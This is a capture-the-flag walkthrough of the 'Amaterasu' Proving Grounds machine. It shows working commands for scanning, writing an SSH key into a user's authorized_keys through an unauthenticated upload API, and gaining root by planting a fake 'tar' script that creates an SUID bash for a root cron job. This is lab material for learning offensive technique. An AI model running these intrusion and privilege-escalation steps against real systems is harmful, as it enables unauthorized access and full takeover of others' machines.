Amaterasu - Proving Grounds


nmap -sCV -p- --min-rate 1000 -v
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I have FTP(port 21), SSH(port 25022) and Apache(port 40080).
Let's enumerate FTP.

FTP - port 21

Let's do a NULL session and get more information.
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FTP Problem (229 Entering Extended Passive Mode)

We have some problemas with the passive mode so i just have to type passive to turn off that mode.
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There isn't information so let's try to find more on Apache server.

Apache - port 40080
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I see a page that talks about Mozilla so let's enumerate subdriectories.

Find subdirectories - Gobuster

Let's look for hidden subdirectories.
gobuster dir -w /usr/share/dirb/wordlists/common.txt -u -x php -b 404,403
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I don't find nothing interesting.

Port Enumeration - Autorecon

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I notice there is a new port discovered that is 33414 so let's enumerate it with nmap.
nmap -sCV -p33414 --min-rate 1000 -v
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Werkzeug/2.2.3 - API

I can notice that is running a Werkzeug/2.2.3 server so let's let's enumerate subdirectories with gobuster.
gobuster dir -w /usr/share/dirb/wordlists/common.txt -u -x php -b 404,403
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I found out 2 subdirectories so let's see what i have.
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I see a list of commands and there is a /file-upload but first let's see what there is on /info subdirectory.
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Since i don't have Allowed privileges let's try to do in other way.

Gain Access - Generate SSH Keys

We can list the directory and upload a file, so let’s go to upload our ssh key.
ssh-keygen -t rsa
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Let's copy public SSH key to authorized_keys file and upload to target machine.
cp /root/.ssh/ authorized_keys
Before i upload to target machine i need to see a user that i can access via ssh so for that let's explore more this website.
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I can see this is vulnerable to a LFI so let's try to enumerate users from target machine.
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Now i have a username called alfredo so let's verify if there is a .ssh folder on this user directory.
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Since we have .ssh folder let's upload to it.
We go to upload the file .pub, before the upload change the name from .pub to .txt and we change again during the upload.
curl -L -i -X POST -H "Content-Type: multipart/form-data" -F file="@/root/oscp/Amaterasu-pg/authorized_keys" -F filename="/home/alfredo/.ssh/authorized_keys"
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Let's change authorized_keys to a txt file and repeate the upload command.
cp authorized_keys authorized_keys.txt
curl -L -i -X POST -H "Content-Type: multipart/form-data" -F file="@/root/oscp/Amaterasu-pg/authorized_keys" -F filename="/home/alfredo/.ssh/authorized_keys"
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Let's SSH with alfredo user.
ssh alfredo@ -p 25022
Pasted image 20241010130210.png

Privilege Escalation

First let's grab user flag.
ls -la
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SUID Binaries

Since i can't also see the sudoers let's check suid binaries.
find / -perm /u=s 2>/dev/null
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I didn't find nothing usefull so let's find for a interesting file.
I check alfredo id and cronjobs but no interesting thins here.
crontab -l
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Let's see .bash_history file next.
cat .bash_history
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It seems there is a file called on restapi folder so let's took a look.
cd restapi
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It shows a upload folder /tmp so i went there and i saw a flask.tar.gz so let's try to download to our local machine and read it.
cd /tmp
ls -la
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tar xvf flask.tar.gz

Cronjob - tar command

Let's see what cronjobs there is on target machine.
cat /etc/crontab
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There is a cronjob running as root which executes the /usr/local/bin/ bash script.
Let's see what this bash file does.
cat /usr/local/bin/
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This file xecutes tar binary as root to extract a file, which can abused by create a script named tar inside the restapi folder.
cd /home/alfredo/restapi
nano tar


cp /bin/bash /home/alfredo/restapi/bash; chmod u+s /home/alfredo/restapi/bash;

chmod +x tar
Once the script is executed as root, it copies bash to restapi folder and applies permission to execute the binary as owner in our case that would be the root user and that the SUID bit is set.
ls -la
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Now let's execute bash command to get root privileges.
./bash -p
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cd /root
ls -la
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